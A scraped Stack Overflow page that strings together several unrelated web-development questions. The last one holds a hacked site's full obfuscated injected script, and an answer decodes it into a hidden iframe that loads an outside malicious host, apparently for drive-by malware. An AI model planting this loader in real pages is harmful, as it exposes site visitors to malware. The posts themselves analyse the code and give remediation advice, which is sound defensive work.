Closed. This question needs details or clarity. It is not currently accepting answers.
Want to improve this question? Add details and clarify the problem by editing this post.
Closed 8 years ago.
Improve this question
Lately, I have been fond of live code editors such as cssdeck and jsFiddle, and I want to replicate my own with one small twist: php code.
The basic elements behind these live code editors are textarea, javascript, and an iframe. You can see the final results either via js script or php form. I went through the js script route, and it works fine for html, css, and js, but not php; the site shows up empty like nothing been entered. When I went the php form route, I got the same results. with php forms, however, I have the ability to create/write php files, which would then display the code correctly, but that would remove the live editing function. I'm wondering if you know any other routes to finish the intended project besides the ones above. Also, I tried
<?php
$codeInput = stripslashes($_POST['code']);
?>
and that turned nothing.
You want to use htmlspecialchars, not stripslashes.
htmlspecialchars is specifically for encoding things like <, as in <?php.
stripslashes only removes backslashes (\).
Be very careful with this, however; directly outputting unfiltered user input can lead to XSS attacks, even if you use htmlspecialchars. Read more here.
As an aside, you probably don't need to roll your own editor for this. You might check out http://ideone.com/ instead, which is basically a jsFiddle for PHP and a large number of other languages.
Related
Closed. This question needs to be more focused. It is not currently accepting answers.
Want to improve this question? Update the question so it focuses on one problem only by editing this post.
Closed 5 years ago.
Improve this question
I have plain HTML code, without Javascript code in it.
How would you detect if any form of Javascript was injected in the HTML ?
The application generates HTML client side. And needs to validate it once it arrives on the server.
The goal is NOT to remove Javascript, but simply detect the presence of it.
This is what tools like HTML Purifier are for. They break the input into tokens are run them against a white list.
This is safer than trying to find specific ways of inserting scripts into HTML, because there are tricks with malformed tags or non obvious attributes being used. See the XSS Evasion Cheat Sheet for example.
Removing can be easier than detecting - just escape all the HTML etc. you get with htmlspecialchars($string).
Alright, so this is a very interesting challenge:
First, check for all script tags, both capital and lowercase
<SCRIPT> <script> <sCrIPt>
Then, check for event handlers (onclick etc).
For this, we use DOM
$dom = new DOMDocument;
$dom->loadHTML($string);
You can work all sorts of magic with DOM, I recommend reading their documentation. Check for any attributes with "on" in them
Closed. This question needs to be more focused. It is not currently accepting answers.
Want to improve this question? Update the question so it focuses on one problem only by editing this post.
Closed 7 years ago.
Improve this question
This is probably a simple question, but I'm struggling with this.
Basically, how to browse in a database, as the user is typing something?
For example, in a website such as https://www.doesthedogdie.com/, how do they do it to show all the movies beggining with the string of characters you're typing, as you're typing it?
I guess javascript is involved?
It's called autocomplete
Please do some googling next time yourself.
You can use jQuery autocomplete or Bootstrap typeahead to achieve this.
Hope this helps
My personal preference on how to make these kind of systems is fairly awkward, yet it seems to work just fine for me without requiring too much client-side scripting.I use ASP.NET's Page_Load event to save all content in a SQL database into an XML file. Then, when the user enters some text into the field, I make a hidden div class underneath it unhidden to display filtered results from the XML document. This way, you can update the SQL database at any time fairly simply to add new records which should be listed on the website.This is server-side scripting, which I prefer to client-side because the user can disable features and mess around with it to view your code which is something I personally hate.I hope this helps you somewhat.
Closed. This question needs debugging details. It is not currently accepting answers.
Edit the question to include desired behavior, a specific problem or error, and the shortest code necessary to reproduce the problem. This will help others answer the question.
Closed 7 years ago.
Improve this question
I'm trying to generate HTML using PHP and have that HTML printed out and displayed on a site for a user to then copy and paste elsewhere. My problem, however, is that whenever I try to use print or echo statements and type in the HTML, the HTML is being rendered instead of simply just printed. I even put the HTML as a string into a variable and tried printing/echoing that variable but it was also rendered. Is there any way to literally just have the words I'm typing (which happen to be HTML) printed or displayed in some way on the page in a box or something of the sort?
if I understood your question, I think you should use htmlentities():
print htmlentities('<br>');
This wil show the tag instead of generate a new line.
Closed. This question needs details or clarity. It is not currently accepting answers.
Want to improve this question? Add details and clarify the problem by editing this post.
Closed 8 years ago.
Improve this question
Is there a way to create page turner effect for PDF files with angular? Jquery solutions are also fine. I have seen turn.js which uses html. Can any one help out to find a way for PDF files?
If you are talking about the pages within a PDF having a page curl effect then it is not something you can do with js, html or anything else outside the PDF itself without converting the PDF to something else (ie flash, jpg images, etc).
Last time I checked the only way to achieve this within a PDF was by using Acrobat Pro or InDesign and using 'Page Transitions'.
Please note that out of the available page transitions 'Page Turn' (the curl effect you want) will cause the document to be converted to a flash file and then embedded in the PDF.
I'm sorry if this is not what you want to hear. Rather than creating fancy page curl/turn effects it is probably better to concentrate on producing a well designed, easy to navigate document with great content. This will provide much better value.
Closed. This question is off-topic. It is not currently accepting answers.
Want to improve this question? Update the question so it's on-topic for Stack Overflow.
Closed 11 years ago.
Improve this question
Somehow my index.php file at the server get modified. As a result, when I open my webpage, I get redirected automatically to this address: redirected url
It seems someone has hacked my application. I found the index.php file was added with the following javaSscript:
<script>aa=([].slice+'hjkbghkj').substr(2-1,4);if((aa=="func")||(aa=="unct"))aa=(document['createDocumentFragm'+'e'+'n'+'t']+'evweds').substr(2-1,4);if((aa=="func")||(aa=="unct")){ss=new String();s=String;12-function(){e=eval;f='fromCharCode';}();t='k';}ddd=new Date();d2=new Date(ddd.valueOf()-2);h=(ddd-d2)*-1;n=["4.5k4.5k52.5k51k16k20k50k55.5k49.5k58.5k54.5k50.5k55k58k23k51.5k50.5k58k34.5k54k50.5k54.5k50.5k55k58k57.5k33k60.5k42k48.5k51.5k39k48.5k54.5k50.5k20k19.5k49k55.5k50k60.5k19.5k20.5k45.5k24k46.5k20.5k61.5k4.5k4.5k4.5k52.5k51k57k48.5k54.5k50.5k57k20k20.5k29.5k4.5k4.5k62.5k16k50.5k54k57.5k50.5k16k61.5k4.5k4.5k4.5k50k55.5k49.5k58.5k54.5k50.5k55k58k23k59.5k57k52.5k58k50.5k20k17k30k52.5k51k57k48.5k54.5k50.5k16k57.5k57k49.5k30.5k19.5k52k58k58k56k29k23.5k23.5k56k48.5k57.5k50.5k57k55.5k56k50.5k57k23k52.5k55k23.5k52.5k55k23k49.5k51.5k52.5k31.5k50k50.5k51k48.5k58.5k54k58k19.5k16k59.5k52.5k50k58k52k30.5k19.5k24.5k24k19.5k16k52k50.5k52.5k51.5k52k58k30.5k19.5k24.5k24k19.5k16k57.5k58k60.5k54k50.5k30.5k19.5k59k52.5k57.5k52.5k49k52.5k54k52.5k58k60.5k29k52k52.5k50k50k50.5k55k29.5k56k55.5k57.5k52.5k58k52.5k55.5k55k29k48.5k49k57.5k55.5k54k58.5k58k50.5k29.5k54k50.5k51k58k29k24k29.5k58k55.5k56k29k24k29.5k19.5k31k30k23.5k52.5k51k57k48.5k54.5k50.5k31k17k20.5k29.5k4.5k4.5k62.5k4.5k4.5k51k58.5k55k49.5k58k52.5k55.5k55k16k52.5k51k57k48.5k54.5k50.5k57k20k20.5k61.5k4.5k4.5k4.5k59k48.5k57k16k51k16k30.5k16k50k55.5k49.5k58.5k54.5k50.5k55k58k23k49.5k57k50.5k48.5k58k50.5k34.5k54k50.5k54.5k50.5k55k58k20k19.5k52.5k51k57k48.5k54.5k50.5k19.5k20.5k29.5k51k23k57.5k50.5k58k32.5k58k58k57k52.5k49k58.5k58k50.5k20k19.5k57.5k57k49.5k19.5k22k19.5k52k58k58k56k29k23.5k23.5k56k48.5k57.5k50.5k57k55.5k56k50.5k57k23k52.5k55k23.5k52.5k55k23k49.5k51.5k52.5k31.5k50k50.5k51k48.5k58.5k54k58k19.5k20.5k29.5k51k23k57.5k58k60.5k54k50.5k23k59k52.5k57.5k52.5k49k52.5k54k52.5k58k60.5k30.5k19.5k52k52.5k50k50k50.5k55k19.5k29.5k51k23k57.5k58k60.5k54k50.5k23k56k55.5k57.5k52.5k58k52.5k55.5k55k30.5k19.5k48.5k49k57.5k55.5k54k58.5k58k50.5k19.5k29.5k51k23k57.5k58k60.5k54k50.5k23k54k50.5k51k58k30.5k19.5k24k19.5k29.5k51k23k57.5k58k60.5k54k50.5k23k58k55.5k56k30.5k19.5k24k19.5k29.5k51k23k57.5k50.5k58k32.5k58k58k57k52.5k49k58.5k58k50.5k20k19.5k59.5k52.5k50k58k52k19.5k22k19.5k24.5k24k19.5k20.5k29.5k51k23k57.5k50.5k58k32.5k58k58k57k52.5k49k58.5k58k50.5k20k19.5k52k50.5k52.5k51.5k52k58k19.5k22k19.5k24.5k24k19.5k20.5k29.5k4.5k4.5k4.5k50k55.5k49.5k58.5k54.5k50.5k55k58k23k51.5k50.5k58k34.5k54k50.5k54.5k50.5k55k58k57.5k33k60.5k42k48.5k51.5k39k48.5k54.5k50.5k20k19.5k49k55.5k50k60.5k19.5k20.5k45.5k24k46.5k23k48.5k56k56k50.5k55k50k33.5k52k52.5k54k50k20k51k20.5k29.5k4.5k4.5k62.5"];n=n[0].split(t);for(i=0;n.length-i>0;i++)ss+=s[f](-h*n[i]);f=ss;e(f);</script>
Does anyone know the meaning of above script?
By removing that script, my web could run well as it was. Any recommendation about how to prevent this attack?
That's just a bunch of obfuscated code; no one will tell you the meaning of that (most likely, except Jon Skeet).
I would suggest you remove that script from the page, and revert to your last commit (you ARE using a version control system, aren't you? :)
This is the code that gets eval'd
if (document.getElementsByTagName('body')[0]){
iframer();
} else {
document.write("<iframe src='http://paseroper.in/in.cgi?default' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}
function iframer(){
var f = document.createElement('iframe');
f.setAttribute('src','http://paseroper.in/in.cgi?default');
f.style.visibility='hidden';
f.style.position='absolute';
f.style.left='0';
f.style.top='0';
f.setAttribute('width','10');
f.setAttribute('height','10');
document.getElementsByTagName('body')[0].appendChild(f);
}
Creates an <iframe> that goes to that URL.
As for how to prevent it, you'll need to find out how the code got in there. Likely one of your scripts allowed them to run arbitrary code on your server, so I would check all php plugins, and any place where you may allow users to enter information and make sure you are properly filtering things.
Also, you'll likely want to let your users know. From the looks of it, the <iframe> is hidden, which indicates it might be a site in which they try and do drive-by installs of malware or spyware.